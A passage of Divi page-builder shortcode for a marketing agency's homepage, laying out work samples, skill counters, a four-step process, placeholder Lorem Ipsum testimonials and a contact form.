button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/434x434.jpg\" title_text=\"434x434\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/217x434.jpg\" title_text=\"217x434\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"4.5.2\" custom_padding=\"0px||0px|\" hover_enabled=\"0\" custom_margin=\"||||false|false\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" title_text=\"800x800..1\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" title_text=\"800x800\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12.png\" alt=\"Best Advertising agency\" title_text=\"best advertising agency\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p>NOBODY READS ADS, PEOPLE READ WHAT INTERESTS THEM &amp; SOMETIME IT\'S AN AD</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5.jpg\" alt=\"marketing strategy\" title_text=\"marketing strategy\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]<p>Best Advertising Is Done By Satisfied Customers. We Believe &amp; Nurture It In Our Business.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" 